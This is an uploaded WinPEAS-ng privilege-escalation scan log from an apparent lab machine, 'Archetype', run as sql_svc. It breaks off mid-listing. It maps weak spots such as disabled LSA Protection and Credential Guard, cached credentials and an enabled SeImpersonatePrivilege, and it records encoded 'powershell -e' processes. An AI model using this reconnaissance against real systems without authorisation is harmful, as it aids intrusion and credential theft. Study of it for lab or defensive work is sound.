Test

The document provides an overview of a Windows Server 2019 system's configuration and security settings, including user accounts, environment variables, and audit policies. It highlights potential vulnerabilities and misconfigurations, such as the lack of LSA protection and Credential Guard. Additionally, it includes usage guidelines for the WinPEAS-ng tool, emphasizing its intended use for authorized penetration testing and educational purposes only.

Uploaded by

trashmail.armand


ADVISORY: winpeas should be used for authorized penetration testing and/or
educational purposes only. Any misuse of this software will not be the
responsibility of the author or of any other collaborator. Use it at your own
devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live

/---------------------------------------------------------------------------------\
| Do you like PEASS?                                                              |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : training.hacktricks.xyz                                   |
| Follow on Twitter : @hacktricks_live                                            |
| Respect on HTB : SirBroccoli                                                    |
|---------------------------------------------------------------------------------|
| Thank you!                                                                      |
\---------------------------------------------------------------------------------/

[+] Legend:
Red Indicates a special privilege over an object or
something is misconfigured
Green Indicates that some protection is enabled or something
is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links

You can find a Windows local PE Checklist here:
https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html

Creating Dynamic lists, this could take a while, please wait...

- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...

════════════════════════════════════╣ System Information ╠════════════════════════════════════

╔══════════╣ Basic System Information
╚ Check if the Windows version is vulnerable to some known exploit
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hostname: Archetype
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 3/7/2025 12:33:43 PM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5004335 (7/27/2021), KB5003711 (7/26/2021), KB5004244 (7/27/2021),

╔══════════╣ Showing All Microsoft Updates
[X] Exception: Exception has been thrown by the target of an invocation.

╔══════════╣ System Last Shutdown Date/time (from Registry)

Last Shutdown Date/time : 10/14/2021 1:19:25 AM

╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: ARCHETYPE
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\sql_svc\AppData\Local
PSModulePath: C:\Users\sql_svc\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\PowerShell\Modules\
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\;C:\Users\sql_svc\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\sql_svc
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
COMPLUS_MDA: InvalidVariant;RaceOnRCWCleanup;InvalidFunctionPointerInDelegate;InvalidMemberDeclaration;ReleaseHandleFailed;MarshalCleanupError;ReportAvOnComRelease;DangerousThreadingAPI;invalidOverlappedToPinvoke
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\sql_svc\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\sql_svc\AppData\Roaming
TMP: C:\Users\sql_svc\AppData\Local\Temp
USERNAME: sql_svc
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: ARCHETYPE

╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\PowerShell\Modules\
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101

╔══════════╣ Audit Settings
╚ Check what is being logged
Not Found

╔══════════╣ Audit Policy Settings - Classic & Advanced

╔══════════╣ WEF Settings
╚ Windows Event Forwarding: it is useful to know where the logs are sent
Not Found

╔══════════╣ LAPS Settings
╚ If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed

╔══════════╣ Wdigest
╚ If enabled, plain-text creds could be stored in LSASS
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest

Wdigest is not enabled

╔══════════╣ LSA Protection
╚ If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key)
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection

LSA Protection is not enabled

╔══════════╣ Credentials Guard
╚ If enabled, a driver is needed to read LSASS memory
https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard

CredentialGuard is not enabled
Virtualization Based Security Status: Not enabled
Configured: False
Running: False

╔══════════╣ Cached Creds
╚ If > 0, credentials will be cached in the registry and accessible by SYSTEM user
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials
cachedlogonscount is 10

╔══════════╣ Enumerating saved credentials in Registry (CurrentPass)

╔══════════╣ AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found

╔══════════╣ Windows Defender configuration
Local Settings
Group Policy Settings

╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss

ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.

╔══════════╣ PowerShell Settings


PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79B

╔══════════╣ Enumerating PowerShell Session Settings using the registry
You must be an administrator to run this check

╔══════════╣ PS default transcripts history
╚ Read the PS history inside these files (if any)

╔══════════╣ HKCU Internet Settings


DisableCachingOfSSLPages: 0
IE5_UA_Backup_Flag: 5.0
PrivacyAdvanced: 1
SecureProtocols: 2688
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
CertificateRevocation: 1
ZonesSecurityUpgrade: System.Byte[]
EnableNegotiate: 1
ProxyEnable: 0

╔══════════╣ HKLM Internet Settings


EnablePunycode: 1

╔══════════╣ Drives Information
╚ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users [AppendData/CreateDirectories])

╔══════════╣ Checking WSUS
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
Not Found

╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayupp
The system isn't inside a domain, so it isn't vulnerable

╔══════════╣ Checking If Inside Container
╚ If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container

╔══════════╣ Checking AlwaysInstallElevated
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated

AlwaysInstallElevated isn't available

╔══════════╣ Enumerate LSA settings - auth packages included

auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : scecli
Authentication Packages : msv1_0
SecureBoot : 1
LsaPid : 620
LsaCfgFlagsDefault : 0
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1

╔══════════╣ Enumerating NTLM Settings


LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)

NTLM Signing Settings

ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)

Session Security

NTLMMinClientSec : 536870912 (Require 128-bit encryption)
NTLMMinServerSec : 536870912 (Require 128-bit encryption)

NTLM Auditing and Restrictions

InboundRestrictions : (Not defined)
OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :

╔══════════╣ Display Local Group Policy settings - local users/machine

╔══════════╣ Checking AppLocker effective policy


AppLockerPolicy version: 1
listing rules:

╔══════════╣ Enumerating Printers (WMI)

╔══════════╣ Enumerating Named Pipes

Name: eventlog
CurrentUserPerms: Everyone [WriteData/CreateFiles]
Sddl: O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

Name: sql\query
CurrentUserPerms: Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories]
Sddl: O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)

Name: SQLLocal\MSSQLSERVER
CurrentUserPerms: Everyone [WriteData/CreateFiles], sql_svc [AppendData/CreateDirectories]
Sddl: O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)

Name: vgauth-service
CurrentUserPerms: Everyone [WriteData/CreateFiles]
Sddl: O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)

╔══════════╣ Enumerating AMSI registered providers


Provider: {2781761E-28E0-4109-99FE-B9D127C57AFE}
Path:

=================================================================================================

╔══════════╣ Enumerating Sysmon configuration


You must be an administrator to run this check

╔══════════╣ Enumerating Sysmon process creation logs (1)


You must be an administrator to run this check

╔══════════╣ Installed .NET versions

CLR Versions
4.0.30319

.NET Versions

4.7.03190

.NET & AMSI (Anti-Malware Scan Interface) support

.NET version supports AMSI : False
OS supports AMSI : True

════════════════════════════════════╣ Interesting Events information ╠════════════════════════════════════

╔══════════╣ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials

You must be an administrator to run this check

╔══════════╣ Printing Account Logon Events (4624) for the last 10 days.
You must be an administrator to run this check

╔══════════╣ Process creation events - searching logs (EID 4688) for sensitive data.

You must be an administrator to run this check

╔══════════╣ PowerShell events - script block logs (EID 4104) - searching for sensitive data.

╔══════════╣ Displaying Power off/on events for last 5 days

3/7/2025 8:06:26 AM : Startup

════════════════════════════════════╣ Users Information ╠════════════════════════════════════

╔══════════╣ Users
╚ Check if you have some admin equivalent privileges
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups

Current user: sql_svc
Current groups: Domain Users, Everyone, Users, Builtin\Performance Monitor Users, Service, Console Logon, Authenticated Users, This Organization, Local account, MSSQLSERVER, Local, NTLM Authentication

=================================================================================================

ARCHETYPE\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-NotExpi-Req

ARCHETYPE\DefaultAccount(Disabled): A user account managed by the system.
|->Groups: System Managed Accounts Group
|->Password: CanChange-NotExpi-NotReq

ARCHETYPE\Guest: Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq

ARCHETYPE\sql_svc
|->Groups: Users
|->Password: CanChange-NotExpi-Req

ARCHETYPE\WDAGUtilityAccount(Disabled): A user account managed and used by the system for Windows Defender Application Guard scenarios.
|->Password: CanChange-Expi-Req

╔══════════╣ Current User Idle Time
Current User : ARCHETYPE\sql_svc
Idle Time : 03h:27m:20s:390ms

╔══════════╣ Display Tenant information (DsRegCmd.exe /status)

╔══════════╣ Current Token privileges
╚ Check if you can escalate privilege using some enabled token
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation

SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED

╔══════════╣ Clipboard text

╔══════════╣ Logged users
NT SERVICE\SQLTELEMETRY
ARCHETYPE\sql_svc

╔══════════╣ Display information about local users
Computer Name : ARCHETYPE
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 10/14/2021 1:12:47 AM
Logons Count : 23
Password Last Set : 3/17/2020 1:37:03 AM

=================================================================================================

Computer Name : ARCHETYPE
User Name : DefaultAccount
User Id : 503
Is Enabled : False
User Type : Guest
Comment : A user account managed by the system.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM

=================================================================================================

Computer Name : ARCHETYPE
User Name : Guest
User Id : 501
Is Enabled : True
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/20/2020 3:59:49 AM

=================================================================================================

Computer Name : ARCHETYPE
User Name : sql_svc
User Id : 1001
Is Enabled : True
User Type : User
Comment :
Last Logon : 3/7/2025 12:28:31 PM
Logons Count : 24
Password Last Set : 1/19/2020 3:05:12 PM

=================================================================================================

Computer Name : ARCHETYPE
User Name : WDAGUtilityAccount
User Id : 504
Is Enabled : False
User Type : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00 AM

=================================================================================================

╔══════════╣ RDP Sessions
Not Found

╔══════════╣ Ever logged users
NT SERVICE\SQLTELEMETRY
ARCHETYPE\Administrator
ARCHETYPE\sql_svc

╔══════════╣ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Service [WriteData/CreateFiles]
C:\Users\sql_svc : sql_svc [AllAccess]

╔══════════╣ Looking for AutoLogon credentials
Not Found

╔══════════╣ Password Policies
╚ Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0

=================================================================================================

Domain: ARCHETYPE
SID: S-1-5-21-1479773013-2644727484-962428355
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX

=================================================================================================

╔══════════╣ Print Logon Sessions
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 77893
Logon Time:
Logon Type: Service
Start Time: 3/7/2025 8:06:33 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:06:33 AM
User Name: sql_svc
User Principal Name:
User SID:

=================================================================================================

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 335452
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:09:57 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:09:57 AM
User Name: sql_svc
User Principal Name:
User SID:

=================================================================================================

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 6233225
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 12:28:31 PM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 12:28:31 PM
User Name: sql_svc
User Principal Name:
User SID:

=================================================================================================

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 4227863
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 10:30:13 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 10:30:13 AM
User Name: sql_svc
User Principal Name:
User SID:

=================================================================================================

Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 544125
Logon Time:
Logon Type: Network
Start Time: 3/7/2025 8:17:23 AM
Domain: ARCHETYPE
Authentication Package: NTLM
Start Time: 3/7/2025 8:17:23 AM
User Name: sql_svc
User Principal Name:
User SID:

=================================================================================================

════════════════════════════════════╣ Processes Information ╠════════════════════════════════════

╔══════════╣ Interesting Processes -non Microsoft-
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#running-processes
cmd(2396)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
<base64-encoded PowerShell command omitted>

=================================================================================================

powershell(1216)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: sql_svc
Command Line: powershell -e
<base64-encoded PowerShell command omitted>

=================================================================================================

conhost(608)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc
Command Line: \??\C:\Windows\system32\conhost.exe 0x4

=================================================================================================

cmd(2472)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
<base64-encoded PowerShell command omitted>

=================================================================================================

cmd(1948)[C:\Windows\system32\cmd.exe] -- POwn: sql_svc
Command Line: "C:\Windows\system32\cmd.exe" /c powershell -e
<base64-encoded PowerShell command omitted>

=================================================================================================

sqlservr(1652)[C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe] -- POwn: sql_svc
Command Line: "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER

=================================================================================================

powershell(744)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: sql_svc
Command Line: powershell -e
<base64-encoded PowerShell command omitted>

=================================================================================================

ssh-keygen(2344)[C:\Windows\System32\OpenSSH\ssh-keygen.exe] -- POwn: sql_svc
Command Line: "C:\Windows\System32\OpenSSH\ssh-keygen.exe" -t rsa -f mykey

=================================================================================================

powershell(1800)[C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] -- POwn: sql_svc
Command Line: powershell -e

=================================================================================================

conhost(2952)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc
Command Line: \??\C:\Windows\system32\conhost.exe 0x4

=================================================================================================

conhost(2680)[C:\Windows\system32\conhost.exe] -- POwn: sql_svc
Command Line: \??\C:\Windows\system32\conhost.exe 0x4

=================================================================================================

winpeas(4064)[C:\Users\Public\winpeas.exe] -- POwn: sql_svc -- isDotNet
Permissions: sql_svc [AllAccess], Service [WriteData/CreateFiles]
Possible DLL Hijacking folder: C:\Users\Public (Service [WriteData/CreateFiles])
Command Line: "C:\Users\Public\winpeas.exe"

=================================================================================================

╔══════════╣ Vulnerable Leaked Handlers
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#leaked-handlers

Getting Leaked Handlers, it might take some time...


Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\master.mdf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\model.mdf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\modellog.ldf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\templog.ldf
File Owner: BUILTIN\Administrators

=================================================================================================

Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators

=================================================================================================

════════════════════════════════════╣ Services Information ╠════════════════════════════════════

╔══════════╣ Interesting Services -non Microsoft-
╚ Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services

ssh-agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Disabled - Stopped
Agent to hold private keys used for public key authentication.

=================================================================================================

VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Auto - Running
Alias Manager and Ticket Service

=================================================================================================

vm3dservice(VMware, Inc. - VMware SVGA Helper Service)[C:\Windows\system32\vm3dservice.exe] - Auto - Running
Helps VMware SVGA driver by collecting and conveying user mode information

=================================================================================================

VMTools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Auto - Running
Provides support for synchronizing objects between the host and guest operating systems.

=================================================================================================

╔══════════╣ Modifiable Services
╚ Check if you can modify any service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services

You cannot modify any service

╔══════════╣ Looking if you can modify any service registry
╚ Check if you can modify the registry of a service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services-registry-modify-permissions

[-] Looks like you cannot change the registry of any service...

╔══════════╣ Checking write permissions in PATH folders (DLL Hijacking)
╚ Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\
C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\Tools\Binn\
C:\Program Files\Microsoft SQL Server\140\DTS\Binn\

════════════════════════════════════╣ Applications Information ╠════════════════════════════════════

╔══════════╣ Current Active Window Application
[X] Exception: Object reference not set to an instance of an object.

╔══════════╣ Installed Applications --Via Program Files/Uninstall registry--
╚ Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\common files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Microsoft SQL Server
C:\Program Files\Microsoft Visual Studio 10.0
C:\Program Files\Microsoft.NET
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell

╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\

=================================================================================================

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

=================================================================================================

RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Key: Common Startup
Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

=================================================================================================

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Userinit
Folder: C:\Windows\system32
File: C:\Windows\system32\userinit.exe,

=================================================================================================

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Key: Shell
Folder: None (PATH Injection)
File: explorer.exe

=================================================================================================

RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe

=================================================================================================

RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll

=================================================================================================

RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
Key: Adobe Type Manager
Folder: None (PATH Injection)
File: atmfd.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wow64cpu
Folder: None (PATH Injection)
File: wow64cpu.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _wowarmhw
Folder: None (PATH Injection)
File: wowarmhw.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: _xtajit
Folder: None (PATH Injection)
File: xtajit.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: advapi32
Folder: None (PATH Injection)
File: advapi32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: clbcatq
Folder: None (PATH Injection)
File: clbcatq.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: combase
Folder: None (PATH Injection)
File: combase.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: COMDLG32
Folder: None (PATH Injection)
File: COMDLG32.dll

=================================================================================================

RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
